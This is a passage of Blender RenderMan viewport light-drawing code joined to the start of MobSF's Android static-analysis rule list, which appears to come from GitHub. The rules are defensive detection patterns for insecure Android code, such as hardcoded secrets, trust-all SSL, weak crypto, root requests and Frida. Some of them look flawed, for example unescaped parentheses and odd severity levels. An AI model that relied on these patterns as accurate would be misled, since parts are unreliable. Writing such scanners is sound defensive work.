batch.draw(_SHADER_)
def draw_disk_light(ob):
_SHADER_.bind()
set_selection_color(ob)
ob_matrix = Matrix(ob.matrix_world)
m = ob_matrix @ Matrix.Rotation(math.radians(180.0), 4, 'Y')
disk = []
for pt in s_diskLight:
disk.append( m @ Vector(pt))
disk_indices = _get_indices(s_diskLight)
batch = batch_for_shader(_SHADER_, 'LINES', {"pos": disk}, indices=disk_indices)
batch.draw(_SHADER_)
arrow = []
for pt in s_rmanLightLogo['arrow']:
arrow.append( m @ Vector(pt))
arrow_indices = _get_indices(s_rmanLightLogo['arrow'])
batch = batch_for_shader(_SHADER_, 'LINES', {"pos": arrow}, indices=arrow_indices)
batch.draw(_SHADER_)
m = ob_matrix
R_outside = []
for pt in s_rmanLightLogo['R_outside']:
R_outside.append( m @ Vector(pt))
R_outside_indices = _get_indices(s_rmanLightLogo['R_outside'])
batch = batch_for_shader(_SHADER_, 'LINES', {"pos": R_outside}, indices=R_outside_indices)
batch.draw(_SHADER_)
R_inside = []
for pt in s_rmanLightLogo['R_inside']:
R_inside.append( m @ Vector(pt))
R_inside_indices = _get_indices(s_rmanLightLogo['R_inside'])
batch = batch_for_shader(_SHADER_, 'LINES', {"pos": R_inside}, indices=R_inside_indices)
batch.draw(_SHADER_)
def draw_dist_light(ob):
_SHADER_.bind()
set_selection_color(ob)
ob_matrix = Matrix(ob.matrix_world)
m = ob_matrix @ Matrix.Rotation(math.radians(180.0), 4, 'Y')
arrow1 = []
for pt in s_distantLight['arrow1']:
arrow1.append( m @ Vector(pt) )
arrow1_indices = _get_indices(s_distantLight['arrow1'])
batch = batch_for_shader(_SHADER_, 'LINES', {"pos": arrow1}, indices=arrow1_indices)
batch.draw(_SHADER_)
arrow2 = []
for pt in s_distantLight['arrow2']:
arrow2.append( m @ Vector(pt))
arrow2_indices = _get_indices(s_distantLight['arrow2'])
batch = batch_for_shader(_SHADER_, 'LINES', {"pos": arrow2}, indices=arrow2_indices)
batch.draw(_SHADER_)
arrow3 = []
for pt in s_distantLight['arrow3']:
arrow3.append( m @ Vector(pt) )
arrow3_indices = _get_indices(s_distantLight['arrow3'])
batch = batch_for_shader(_SHADER_, 'LINES', {"pos": arrow3}, indices=arrow3_indices)
batch.draw(_SHADER_)
m = ob_matrix
R_outside = []
for pt in s_rmanLightLogo['R_outside']:
R_outside.append( m @ Vector(pt) )
R_outside_indices = _get_indices(s_rmanLightLogo['R_outside'])
batch = batch_for_shader(_SHADER_, 'LINES', {"pos": R_outside}, indices=R_outside_indices)
batch.draw(_SHADER_)
R_inside = []
for pt in s_rmanLightLogo['R_inside']:
R_inside.append( m @ Vector(pt) )
R_inside_indices = _get_indices(s_rmanLightLogo['R_inside'])
batch = batch_for_shader(_SHADER_, 'LINES', {"pos": R_inside}, indices=R_inside_indices)
batch.draw(_SHADER_)
def draw_portal_light(ob):
_SHADER_.bind()
set_selection_color(ob)
ob_matrix = Matrix(ob.matrix_world)
m = ob_matrix
R_outside = []
for pt in s_rmanLightLogo['R_outside']:
R_outside.append( m @ Vector(pt) )
R_outside_indices = _get_indices(s_rmanLightLogo['R_outside'])
batch = batch_for_shader(_SHADER_, 'LINES', {"pos": R_outside}, indices=R_outside_indices)
batch.draw(_SHADER_)
R_inside = []
for pt in s_rmanLightLogo['R_inside']:
R_inside.append( m @ Vector(pt))
R_inside_indices = _get_indices(s_rmanLightLogo['R_inside'])
batch = batch_for_shader(_SHADER_, 'LINES', {"pos": R_inside}, indices=R_inside_indices)
batch.draw(_SHADER_)
m = ob_matrix @ Matrix.Rotation(math.radians(90.0), 4, 'X')
m = m @ Matrix.Scale(0.5, 4)
rays = []
for pt in s_portalRays:
rays.append( m @ Vector(pt) )
rays_indices = _get_indices(s_portalRays)
batch = batch_for_shader(_SHADER_, 'LINES', {"pos": rays}, indices=rays_indices)
batch.draw(_SHADER_)
def draw_dome_light(ob):
_SHADER_.bind()
set_selection_color(ob)
loc, rot, sca = Matrix(ob.matrix_world).decompose()
axis,angle = rot.to_axis_angle()
m = Matrix.Rotation(angle, 4, axis)
m = m @ Matrix.Scale(100, 4)
sphere = make_sphere(m)
    sphere_indices = _get_indices(sphere)
batch = batch_for_shader(_SHADER_, 'LINES', {"pos": sphere}, indices=sphere_indices)
batch.draw(_SHADER_)
def draw_cylinder_light(ob):
_SHADER_.bind()
set_selection_color(ob)
m = Matrix(ob.matrix_world)
cylinder = []
for pt in s_cylinderLight['vtx']:
cylinder.append( m @ Vector(pt))
batch = batch_for_shader(_SHADER_, 'LINES', {"pos": cylinder}, indices=s_cylinderLight['indices'])
batch.draw(_SHADER_)
def draw_arc(a, b, numSteps, quadrant, xOffset, yOffset, pts):
stepAngle = float(_PI0_5_ / numSteps)
for i in range(0, numSteps):
angle = stepAngle*i + quadrant*_PI0_5_
x = a * math.cos(angle)
y = b * math.sin(angle)
pts.append(Vector([x+xOffset, y+yOffset, 0.0]))
#pts.append(Vector([x+xOffset, 0.0, y+yOffset]))
def draw_rounded_rectangles( left, right,
top, bottom,
radius,
leftEdge, rightEdge,
topEdge, bottomEdge,
zOffset1, zOffset2,
m):
pts = []
a = radius+rightEdge
b = radius+topEdge
draw_arc(a, b, 10, 0, right, top, pts)
a = radius+leftEdge
b = radius+topEdge
draw_arc(a, b, 10, 1, -left, top, pts)
a = radius+leftEdge
b = radius+bottomEdge
draw_arc(a, b, 10, 2, -left, -bottom, pts)
a = radius+rightEdge
b = radius+bottomEdge
draw_arc(a, b, 10, 3, right, -bottom, pts)
translate = m #Matrix.Translation( Vector([0,0, zOffset1])) @ m
shape_pts = []
for pt in pts:
shape_pts.append( translate @ Vector(pt))
shape_pts_indices = _get_indices(shape_pts)
batch = batch_for_shader(_SHADER_, 'LINES', {"pos": shape_pts}, indices=shape_pts_indices)
batch.draw(_SHADER_)
shape_pts = []
translate = m #Matrix.Translation( Vector([0,0, zOffset2])) @ m
for pt in pts:
shape_pts.append( translate @ Vector(pt) )
shape_pts_indices = _get_indices(shape_pts)
batch = batch_for_shader(_SHADER_, 'LINES', {"pos": shape_pts}, indices=shape_pts_indices)
batch.draw(_SHADER_)
def draw_rod(leftEdge, rightEdge, topEdge, bottomEdge,
frontEdge, backEdge, scale, width, radius,
left, right, top, bottom, front, back, world_mat):
leftEdge *= scale
rightEdge *= scale
topEdge *= scale
backEdge *= scale
frontEdge *= scale
bottomEdge *= scale
m = world_mat
# front and back
draw_rounded_rectangles(left, right, top, bottom, radius,
leftEdge, rightEdge,
topEdge, bottomEdge, front, -back, m)
m = world_mat @ Matrix.Rotation(math.radians(-90.0), 4, 'X')
# top and bottom
draw_rounded_rectangles(left, right, back, front, radius,
leftEdge, rightEdge,
backEdge, frontEdge, top, -bottom, m)
m = world_mat @ Matrix.Rotation(math.radians(90.0), 4, 'Y')
# left and right
draw_rounded_rectangles(front, back, top, bottom, radius,
frontEdge, backEdge,
topEdge, bottomEdge, -left, right, m)
def draw_rod_light_filter(ob):
_SHADER_.bind()
set_selection_color(ob)
m = Matrix(ob.matrix_world)
m = m @ Matrix.Rotation(math.radians(90.0), 4, 'X')
m = m @ Matrix.Rotation(math.radians(90.0), 4, 'Y')
#m = m @ Matrix.Rotation(math.radians(180.0), 4, 'Y')
#m = m @ Matrix.Rotation(math.radians(90.0), 4, 'Z')
light = ob.data
rm = light.renderman.get_light_node()
edge = rm.edge
width = rm.width
depth = rm.depth
height = rm.height
radius = rm.radius
left_edge = edge
right_edge = edge
top_edge = edge
bottom_edge = edge
front_edge = edge
back_edge = edge
left = 0.0
right = 0.0
top = 0.0
bottom = 0.0
front = 0.0
back = 0.0
scale_width = 1.0
scale_height = 1.0
scale_depth = 1.0
rod_scale = 0.0
if light.renderman.get_light_node_name() == 'PxrRodLightFilter':
left_edge *= rm.leftEdge
right_edge *= rm.rightEdge
top_edge *= rm.topEdge
bottom_edge *= rm.bottomEdge
front_edge *= rm.frontEdge
back_edge *= rm.backEdge
scale_width *= rm.scaleWidth
scale_height *= rm.scaleHeight
scale_depth *= rm.scaleDepth
left = rm.left
right = rm.right
top = rm.top
bottom = rm.bottom
front = rm.front
back = rm.back
left += scale_width * width
right += scale_width * width
top += scale_height * height
bottom += scale_height * height
front += scale_depth * depth
back += scale_depth * depth
draw_rod(left_edge, right_edge,
top_edge, bottom_edge,
front_edge, back_edge, rod_scale,
width, radius,
left, right, top, bottom, front,
back, m)
if edge > 0.0:
# draw outside box
rod_scale = 1.0
draw_rod(left_edge, right_edge,
top_edge, bottom_edge,
front_edge, back_edge, rod_scale,
width, radius,
left, right, top, bottom, front,
back, m)
def draw_ramp_light_filter(ob):
_SHADER_.bind()
set_selection_color(ob)
light = ob.data
rm = light.renderman.get_light_node()
rampType = int(rm.rampType)
begin = float(rm.beginDist)
end = float(rm.endDist)
# distToLight
if rampType in (0,2):
_SHADER_.bind()
set_selection_color(ob)
m = Matrix(ob.matrix_world)
m = m @ Matrix.Rotation(math.radians(180.0), 4, 'Y')
m = m @ Matrix.Rotation(math.radians(90.0), 4, 'Z')
# begin
begin_m = m @ Matrix.Scale(begin, 4)
disk = []
for pt in s_diskLight:
disk.append( begin_m @ Vector(pt) )
disk_indices = _get_indices(s_diskLight)
batch = batch_for_shader(_SHADER_, 'LINES', {"pos": disk}, indices=disk_indices)
batch.draw(_SHADER_)
m2 = begin_m @ Matrix.Rotation(math.radians(90.0), 4, 'Y')
disk = []
for pt in s_diskLight:
disk.append( m2 @ Vector(pt))
disk_indices = _get_indices(s_diskLight)
batch = batch_for_shader(_SHADER_, 'LINES', {"pos": disk}, indices=disk_indices)
batch.draw(_SHADER_)
m3 = begin_m @ Matrix.Rotation(math.radians(90.0), 4, 'X')
disk = []
for pt in s_diskLight:
disk.append( m3 @ Vector(pt))
disk_indices = _get_indices(s_diskLight)
batch = batch_for_shader(_SHADER_, 'LINES', {"pos": disk}, indices=disk_indices)
batch.draw(_SHADER_)
# end
end_m = m @ Matrix.Scale(end, 4)
disk = []
for pt in s_diskLight:
disk.append( end_m @ Vector(pt))
disk_indices = _get_indices(s_diskLight)
batch = batch_for_shader(_SHADER_, 'LINES', {"pos": disk}, indices=disk_indices)
batch.draw(_SHADER_)
m2 = end_m @ Matrix.Rotation(math.radians(90.0), 4, 'Y')
disk = []
for pt in s_diskLight:
disk.append( m2 @ Vector(pt))
disk_indices = _get_indices(s_diskLight)
batch = batch_for_shader(_SHADER_, 'LINES', {"pos": disk}, indices=disk_indices)
batch.draw(_SHADER_)
m3 = end_m @ Matrix.Rotation(math.radians(90.0), 4, 'X')
disk = []
for pt in s_diskLight:
disk.append( m3 @ Vector(pt))
disk_indices = _get_indices(s_diskLight)
batch = batch_for_shader(_SHADER_, 'LINES', {"pos": disk}, indices=disk_indices)
batch.draw(_SHADER_)
# linear
elif rampType == 1:
m = Matrix(ob.matrix_world)
m = m @ Matrix.Rotation(math.radians(180.0), 4, 'Y')
m = m @ Matrix.Rotation(math.radians(90.0), 4, 'Z')
box = []
for pt in s_rmanLightLogo['box']:
box.append( m @ Vector(pt))
n = mathutils.geometry.normal(box)
n.normalize()
box1 = []
for i,pt in enumerate(box):
if begin > 0.0:
box1.append(pt + (begin * n))
else:
box1.append(pt)
box_indices = _get_indices(s_rmanLightLogo['box'])
batch = batch_for_shader(_SHADER_, 'LINES', {"pos": box1}, indices=box_indices)
batch.draw(_SHADER_)
box2 = []
for pt in box:
box2.append( pt + (end * n) )
batch = batch_for_shader(_SHADER_, 'LINES', {"pos": box2}, indices=box_indices)
batch.draw(_SHADER_)
# radial
elif rampType == 3:
_SHADER_.bind()
set_selection_color(ob)
m = Matrix(ob.matrix_world)
m = m @ Matrix.Rotation(math.radians(180.0), 4, 'Y')
m = m @ Matrix.Rotation(math.radians(90.0), 4, 'Z')
if begin > 0.0:
m1 = m @ Matrix.Scale(begin, 4)
disk = []
for pt in s_diskLight:
disk.append( m1 @ Vector(pt) )
disk_indices = _get_indices(s_diskLight)
batch = batch_for_shader(_SHADER_, 'LINES', {"pos": disk}, indices=disk_indices)
batch.draw(_SHADER_)
m2 = m @ Matrix.Scale(end, 4)
disk = []
for pt in s_diskLight:
disk.append( m2 @ Vector(pt))
disk_indices = _get_indices(s_diskLight)
batch = batch_for_shader(_SHADER_, 'LINES', {"pos": disk}, indices=disk_indices)
batch.draw(_SHADER_)
else:
pass
def draw_barn_light_filter(ob):
global _BARN_LIGHT_DRAW_HELPER_
_SHADER_.bind()
m = Matrix(ob.matrix_world)
m = m @ Matrix.Rotation(math.radians(180.0), 4, 'Y')
#m = m @ Matrix.Rotation(math.radians(90.0), 4, 'Z')
set_selection_color(ob)
if not _BARN_LIGHT_DRAW_HELPER_:
_BARN_LIGHT_DRAW_HELPER_ = BarnLightFilterDrawHelper()
_BARN_LIGHT_DRAW_HELPER_.update_input_params(ob)
vtx_buffer = _BARN_LIGHT_DRAW_HELPER_.vtx_buffer()
pts = []
for pt in vtx_buffer:
pts.append( m @ Vector(pt))
    indices = _BARN_LIGHT_DRAW_HELPER_.idx_buffer(len(pts), 0, 0)  # sized to the full vertex list
# blender wants a list of lists
indices = [indices[i:i+2] for i in range(0, len(indices), 2)]
batch = batch_for_shader(_SHADER_, 'LINES', {"pos": pts}, indices=indices)
batch.draw(_SHADER_)
def draw():
if bpy.context.engine != 'PRMAN_RENDER':
return
scene = bpy.context.scene
for ob in [x for x in scene.objects if x.type == 'LIGHT']:
if ob.hide_get():
continue
if not ob.data.renderman:
continue
rm = ob.data.renderman
if not rm.use_renderman_node:
continue
light_shader = rm.get_light_node()
if not light_shader:
continue
# check the local view for this light
if not ob.visible_in_viewport_get(bpy.context.space_data):
continue
light_shader_name = rm.get_light_node_name()
if light_shader_name == '':
            continue  # skip this light but keep drawing the others
if light_shader_name in RMAN_AREA_LIGHT_TYPES:
if ob.data.type != 'AREA':
if hasattr(ob.data, 'size'):
ob.data.size = 0.0
ob.data.type = 'AREA'
elif ob.data.type != 'POINT':
if hasattr(ob.data, 'size'):
ob.data.size = 0.0
ob.data.type = 'POINT'
if light_shader_name == 'PxrSphereLight':
draw_sphere_light(ob)
elif light_shader_name == 'PxrEnvDayLight':
draw_envday_light(ob)
elif light_shader_name == 'PxrDiskLight':
draw_disk_light(ob)
elif light_shader_name == 'PxrDistantLight':
draw_dist_light(ob)
elif light_shader_name == 'PxrPortalLight':
draw_portal_light(ob)
elif light_shader_name == 'PxrDomeLight':
draw_dome_light(ob)
elif light_shader_name == 'PxrCylinderLight':
draw_cylinder_light(ob)
elif light_shader_name in ['PxrGoboLightFilter', 'PxrCookieLightFilter', 'PxrRectLight']:
draw_rect_light(ob)
elif light_shader_name in ['PxrRodLightFilter', 'PxrBlockerLightFilter']:
draw_rod_light_filter(ob)
elif light_shader_name == 'PxrRampLightFilter':
draw_ramp_light_filter(ob)
elif light_shader_name == 'PxrBarnLightFilter':
# get all lights that the barn is attached to
draw_barn_light_filter(ob)
else:
draw_sphere_light(ob)
def register():
global _DRAW_HANDLER_
_DRAW_HANDLER_ = bpy.types.SpaceView3D.draw_handler_add(draw, (), 'WINDOW', 'POST_VIEW')
def unregister():
global _DRAW_HANDLER_
if _DRAW_HANDLER_:
bpy.types.SpaceView3D.draw_handler_remove(_DRAW_HANDLER_, 'WINDOW')
| mit | 8,597,294,281,433,653,000 | 30.923304 | 186 | 0.543777 | false |
ajinabraham/Mobile-Security-Framework-MobSF | StaticAnalyzer/views/android/android_rules.py | 1 | 19226 | """
Rule Format
1. desc - Description of the findings
2. type
a. string
b. regex
3. match
a. single_regex - if re.findall(regex1, input)
b .regex_and - if re.findall(regex1, input) and re.findall(regex2, input)
c. regex_or - if re.findall(regex1, input) or re.findall(regex2, input)
d. regex_and_perm - if re.findall(regex, input) and (permission in permission_list_from_manifest)
e. single_string - if string1 in input
f. string_and - if (string1 in input) and (string2 in input)
g. string_or - if (string1 in input) or (string2 in input)
h. string_and_or - if (string1 in input) and ((string_or1 in input) or (string_or2 in input))
i. string_or_and - if (string1 in input) or ((string_and1 in input) and (string_and2 in input))
j. string_and_perm - if (string1 in input) and (permission in permission_list_from_manifest)
k. string_or_and_perm - if ((string1 in input) or (string2 in input)) and (permission in permission_list_from_manifest)
4. level
a. high
b. warning
c. info
d. good
5. input_case
a. upper
b. lower
c. exact
6. others
a. string<no> - string1, string2, string3, string_or1, string_and1
b. regex<no> - regex1, regex2, regex3
c. perm - Permission
"""
RULES = [
{
        'desc': 'Files may contain hardcoded sensitive information such as usernames, passwords, and keys.',
'type': 'regex',
'regex1': r'''(password\s*=\s*['|"].+['|"]\s{0,5})|(pass\s*=\s*['|"].+['|"]\s{0,5})|(username\s*=\s*['|"].+['|"]\s{0,5})|(secret\s*=\s*['|"].+['|"]\s{0,5})|(key\s*=\s*['|"].+['|"]\s{0,5})''',
'level': 'high',
'match': 'single_regex',
'input_case': 'lower',
'cvss': 7.4,
'cwe': 'CWE-312'
},
{
'desc': 'IP Address disclosure',
'type': 'regex',
'regex1': r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}',
'level': 'warning',
'match': 'single_regex',
'input_case': 'exact',
'cvss': 4.3,
'cwe': 'CWE-200'
},
{
        'desc': 'Hidden elements in the view can be used to hide data from the user, but that data can still be leaked.',
'type': 'regex',
'regex1': r'setVisibility\(View\.GONE\)|setVisibility\(View\.INVISIBLE\)',
'level': 'high',
'match': 'single_regex',
'input_case': 'exact',
'cvss': 4.3,
'cwe': 'CWE-919'
},
{
        'desc': 'The App uses the ECB mode of a cryptographic encryption algorithm. ECB mode is known to be weak, as it produces the same ciphertext for identical blocks of plaintext.',
'type': 'regex',
'regex1': r'Cipher\.getInstance\(\s*"\s*AES\/ECB',
'level': 'high',
'match': 'single_regex',
'input_case': 'exact',
'cvss': 5.9,
'cwe': 'CWE-327'
},
{
'desc': 'This App uses RSA Crypto without OAEP padding. The purpose of the padding scheme is to prevent a number of attacks on RSA that only work when the encryption is performed without padding.',
'type': 'regex',
'regex1': r'cipher\.getinstance\(\s*"rsa/.+/nopadding',
'level': 'high',
'match': 'single_regex',
'input_case': 'lower',
'cvss': 5.9,
'cwe': 'CWE-780'
},
{
        'desc': 'Insecure Implementation of SSL. Trusting all the certificates or accepting self-signed certificates is a critical security hole. This application is vulnerable to MITM attacks.',
'type': 'regex',
'regex1': r'javax\.net\.ssl',
'regex2': r'TrustAllSSLSocket-Factory|AllTrustSSLSocketFactory|NonValidatingSSLSocketFactory|net\.SSLCertificateSocketFactory|ALLOW_ALL_HOSTNAME_VERIFIER|\.setDefaultHostnameVerifier\(|NullHostnameVerifier\(',
'level': 'high',
'match': 'regex_and',
'input_case': 'exact',
'cvss': 7.4,
'cwe': 'CWE-295'
},
{
        'desc': 'WebView loads files from external storage. Files in external storage can be modified by any application.',
'type': 'regex',
'regex1': r'\.loadUrl\(.*getExternalStorageDirectory\(',
'regex2': r'webkit\.WebView',
'level': 'high',
'match': 'regex_and',
'input_case': 'exact',
'cvss': 5.0,
'cwe': 'CWE-919'
},
{
'desc': 'The file is World Readable. Any App can read from the file',
'type': 'regex',
'regex1': r'MODE_WORLD_READABLE|Context\.MODE_WORLD_READABLE',
'regex2': r'openFileOutput\(\s*".+"\s*,\s*1\s*\)',
'level': 'high',
'match': 'regex_or',
'input_case': 'exact',
'cvss': 4.0,
'cwe': 'CWE-276'
},
{
'desc': 'The file is World Writable. Any App can write to the file',
'type': 'regex',
'regex1': r'MODE_WORLD_WRITABLE|Context\.MODE_WORLD_WRITABLE',
'regex2': r'openFileOutput\(\s*".+"\s*,\s*2\s*\)',
'level': 'high',
'match': 'regex_or',
'input_case': 'exact',
'cvss': 6.0,
'cwe': 'CWE-276'
},
{
'desc': 'The file is World Readable and Writable. Any App can read/write to the file',
'type': 'regex',
'regex1': r'openFileOutput\(\s*".+"\s*,\s*3\s*\)',
'level': 'high',
'match': 'single_regex',
'input_case': 'exact',
'cvss': 6.0,
'cwe': 'CWE-276'
},
{
'desc': 'Weak Hash algorithm used',
'type': 'regex',
'regex1': r'getInstance(\"md4\")|getInstance(\"rc2\")|getInstance(\"rc4\")|getInstance(\"RC4\")|getInstance(\"RC2\")|getInstance(\"MD4\")',
'level': 'high',
'match': 'single_regex',
'input_case': 'exact',
'cvss': 7.4,
'cwe': 'CWE-327'
},
{
'desc': 'MD5 is a weak hash known to have hash collisions.',
'type': 'regex',
'regex1': r'MessageDigest\.getInstance\(\"*MD5\"*\)|MessageDigest\.getInstance\(\"*md5\"*\)|DigestUtils\.md5\(',
'level': 'high',
'match': 'single_regex',
'input_case': 'exact',
'cvss': 7.4,
'cwe': 'CWE-327'
},
{
'desc': 'SHA-1 is a weak hash known to have hash collisions.',
'type': 'regex',
'regex1': r'MessageDigest\.getInstance\(\"*SHA-1\"*\)|MessageDigest\.getInstance\(\"*sha-1\"*\)|DigestUtils\.sha\(',
'level': 'high',
'match': 'single_regex',
'input_case': 'exact',
'cvss': 5.9,
'cwe': 'CWE-327'
},
{
'desc': 'App can write to App Directory. Sensitive Information should be encrypted.',
'type': 'regex',
'regex1': r'MODE_PRIVATE|Context\.MODE_PRIVATE',
'level': 'info',
'match': 'single_regex',
'input_case': 'exact',
'cvss': 3.9,
'cwe': 'CWE-276'
},
{
'desc': 'The App uses an insecure Random Number Generator.',
'type': 'regex',
'regex1': r'java\.util\.Random',
'level': 'high',
'match': 'single_regex',
'input_case': 'exact',
'cvss': 7.5,
'cwe': 'CWE-330'
},
{
'desc': 'The App logs information. Sensitive information should never be logged.',
'type': 'regex',
'regex1': r'Log\.(v|d|i|w|e|f|s)|System\.out\.print|System\.err\.print',
'level': 'info',
'match': 'single_regex',
'input_case': 'exact',
'cvss': 7.5,
'cwe': 'CWE-532'
},
{
        'desc': 'This App uses Java Hash Code. It\'s a weak hash function and should never be used in a secure crypto implementation.',
'type': 'string',
'string1': '.hashCode()',
'level': 'high',
'match': 'single_string',
'input_case': 'exact',
'cvss': 4.3,
'cwe': 'CWE-327'
},
{
        'desc': 'These activities prevent screenshots when they go to the background.',
'type': 'string',
'string1': 'LayoutParams.FLAG_SECURE',
'level': 'good',
'match': 'single_string',
'input_case': 'exact',
'cvss': 0,
'cwe': ''
},
{
'desc': 'This App uses SQL Cipher. But the secret may be hardcoded.',
'type': 'string',
'string1': 'SQLiteOpenHelper.getWritableDatabase(',
'level': 'warning',
'match': 'single_string',
'input_case': 'exact',
'cvss': 0,
'cwe': ''
},
{
'desc': 'This app has capabilities to prevent tapjacking attacks.',
'type': 'string',
'string1': 'setFilterTouchesWhenObscured(true)',
'level': 'good',
'match': 'single_string',
'input_case': 'exact',
'cvss': 0,
'cwe': ''
},
{
'desc': 'App can read/write to External Storage. Any App can read data written to External Storage.',
'perm': 'android.permission.WRITE_EXTERNAL_STORAGE',
'type': 'string',
'string1': '.getExternalStorage',
'string2': '.getExternalFilesDir(',
'level': 'high',
'match': 'string_or_and_perm',
'input_case': 'exact',
'cvss': 5.5,
'cwe': 'CWE-276'
},
{
'desc': 'App creates temp file. Sensitive information should never be written into a temp file.',
'perm': 'android.permission.WRITE_EXTERNAL_STORAGE',
'type': 'string',
'string1': '.createTempFile(',
'level': 'high',
'match': 'string_and_perm',
'input_case': 'exact',
'cvss': 5.5,
'cwe': 'CWE-276'
},
{
'desc': 'Insecure WebView Implementation. Execution of user controlled code in WebView is a critical Security Hole.',
'type': 'string',
'string1': 'setJavaScriptEnabled(true)',
'string2': '.addJavascriptInterface(',
'level': 'warning',
'match': 'string_and',
'input_case': 'exact',
'cvss': 8.8,
'cwe': 'CWE-749'
},
{
'desc': 'This App uses SQL Cipher. SQLCipher provides 256-bit AES encryption to sqlite database files.',
'type': 'string',
'string1': 'SQLiteDatabase.loadLibs(',
'string2': 'net.sqlcipher.',
'level': 'info',
'match': 'string_and',
'input_case': 'exact',
'cvss': 0,
'cwe': ''
},
{
        'desc': 'This App downloads files using the Android Download Manager.',
'type': 'string',
'string1': 'android.app.DownloadManager',
'string2': 'getSystemService(DOWNLOAD_SERVICE)',
'level': 'high',
'match': 'string_and',
'input_case': 'exact',
'cvss': 0,
'cwe': ''
},
{
        'desc': 'This App uses the Realm Database with encryption.',
'type': 'string',
'string1': 'io.realm.Realm',
'string2': '.encryptionKey(',
'level': 'good',
'match': 'string_and',
'input_case': 'exact',
'cvss': 0,
'cwe': ''
},
{
'desc': 'The App may use weak IVs like "0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00" or "0x01,0x02,0x03,0x04,0x05,0x06,0x07". Not using a random IV makes the resulting ciphertext much more predictable and susceptible to a dictionary attack.',
'type': 'string',
'string1': '0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00',
'string2': '0x01,0x02,0x03,0x04,0x05,0x06,0x07',
'level': 'high',
'match': 'string_or',
'input_case': 'exact',
'cvss': 9.8,
'cwe': 'CWE-329'
},
{
'desc': 'Remote WebView debugging is enabled.',
'type': 'string',
'string1': '.setWebContentsDebuggingEnabled(true)',
'string2': 'WebView',
'level': 'high',
'match': 'string_and',
'input_case': 'exact',
'cvss': 5.4,
'cwe': 'CWE-919'
},
{
        'desc': 'This app listens to Clipboard changes. Some malware also listens to Clipboard changes.',
'type': 'string',
'string1': 'content.ClipboardManager',
'string2': 'OnPrimaryClipChangedListener',
'level': 'warning',
'match': 'string_and',
'input_case': 'exact',
'cvss': 0,
'cwe': ''
},
{
'desc': 'This App copies data to clipboard. Sensitive data should not be copied to clipboard as other applications can access it.',
'type': 'string',
'string1': 'content.ClipboardManager',
'string2': 'setPrimaryClip(',
'level': 'info',
'match': 'string_and',
'input_case': 'exact',
'cvss': 0,
'cwe': ''
},
{
        'desc': 'Insecure WebView Implementation. WebView ignores SSL Certificate errors and accepts any SSL Certificate. This application is vulnerable to MITM attacks.',
'type': 'string',
'string1': 'onReceivedSslError(WebView',
'string2': '.proceed();',
'level': 'high',
'match': 'string_and',
'input_case': 'exact',
'cvss': 7.4,
'cwe': 'CWE-295'
},
{
        'desc': 'The App uses the SQLite database and executes raw SQL queries. Untrusted user input in raw SQL queries can cause SQL Injection. Sensitive information should also be encrypted before being written to the database.',
'type': 'string',
'string1': 'android.database.sqlite',
'string_or1': 'rawQuery(',
'string_or2': 'execSQL(',
'level': 'high',
'match': 'string_and_or',
'input_case': 'exact',
'cvss': 5.9,
'cwe': 'CWE-89'
},
{
'desc': 'This App detects frida server.',
'type': 'string',
'string1': 'fridaserver',
'string_or1': '27047',
'string_or2': 'REJECT',
'string_or3': 'LIBFRIDA',
'level': 'good',
'match': 'string_and_or',
'input_case': 'exact',
'cvss': 0,
'cwe': ''
},
{
'desc': 'This App uses an SSL Pinning Library (org.thoughtcrime.ssl.pinning) to prevent MITM attacks in secure communication channel.',
'type': 'string',
'string1': 'org.thoughtcrime.ssl.pinning',
'string_or1': 'PinningHelper.getPinnedHttpsURLConnection',
'string_or2': 'PinningHelper.getPinnedHttpClient',
'string_or3': 'PinningSSLSocketFactory(',
'level': 'good',
'match': 'string_and_or',
'input_case': 'exact',
'cvss': 0,
'cwe': ''
},
{
        'desc': 'This App has capabilities to prevent screenshots from Recent Task History/Now On Tap etc.',
'type': 'string',
'string1': '.FLAG_SECURE',
'string_or1': 'getWindow().setFlags(',
'string_or2': 'getWindow().addFlags(',
'level': 'high',
'match': 'string_and_or',
'input_case': 'exact',
'cvss': 0,
'cwe': ''
},
{
        'desc': 'DexGuard Debug Detection code to detect whether an App is debuggable or not is identified.',
'type': 'string',
'string1': 'import dexguard.util',
'string2': 'DebugDetector.isDebuggable',
'level': 'good',
'match': 'string_and',
'input_case': 'exact',
'cvss': 0,
'cwe': ''
},
{
'desc': 'DexGuard Debugger Detection code is identified.',
'type': 'string',
'string1': 'import dexguard.util',
'string2': 'DebugDetector.isDebuggerConnected',
'level': 'good',
'match': 'string_and',
'input_case': 'exact',
'cvss': 0,
'cwe': ''
},
{
'desc': 'DexGuard Emulator Detection code is identified.',
'type': 'string',
'string1': 'import dexguard.util',
'string2': 'EmulatorDetector.isRunningInEmulator',
'level': 'good',
'match': 'string_and',
'input_case': 'exact',
'cvss': 0,
'cwe': ''
},
{
        'desc': 'DexGuard code to detect whether the App is signed with a debug key or not is identified.',
'type': 'string',
'string1': 'import dexguard.util',
'string2': 'DebugDetector.isSignedWithDebugKey',
'level': 'good',
'match': 'string_and',
'input_case': 'exact',
'cvss': 0,
'cwe': ''
},
{
'desc': 'DexGuard Root Detection code is identified.',
'type': 'string',
'string1': 'import dexguard.util',
'string2': 'RootDetector.isDeviceRooted',
'level': 'good',
'match': 'string_and',
'input_case': 'exact',
'cvss': 0,
'cwe': ''
},
{
'desc': 'DexGuard App Tamper Detection code is identified.',
'type': 'string',
'string1': 'import dexguard.util',
'string2': 'TamperDetector.checkApk',
'level': 'good',
'match': 'string_and',
'input_case': 'exact',
'cvss': 0,
'cwe': ''
},
{
'desc': 'DexGuard Signer Certificate Tamper Detection code is identified.',
'type': 'string',
'string1': 'import dexguard.util',
'string2': 'TCertificateChecker.checkCertificate',
'level': 'good',
'match': 'string_and',
'input_case': 'exact',
'cvss': 0,
'cwe': ''
},
{
'desc': 'The App may use package signature for tamper detection.',
'type': 'string',
'string1': 'PackageManager.GET_SIGNATURES',
'string2': 'getPackageName(',
'level': 'good',
'match': 'string_and',
'input_case': 'exact',
'cvss': 0,
'cwe': ''
},
{
'desc': 'This App uses SafetyNet API.',
'type': 'string',
'string1': 'com.google.android.gms.safetynet.SafetyNetApi',
'level': 'good',
'match': 'single_string',
'input_case': 'exact',
'cvss': 0,
'cwe': ''
},
{
'desc': 'This App may request root (Super User) privileges.',
'type': 'string',
'string1': 'com.noshufou.android.su',
'string2': 'com.thirdparty.superuser',
'string3': 'eu.chainfire.supersu',
'string4': 'com.koushikdutta.superuser',
'string5': 'eu.chainfire.',
'level': 'high',
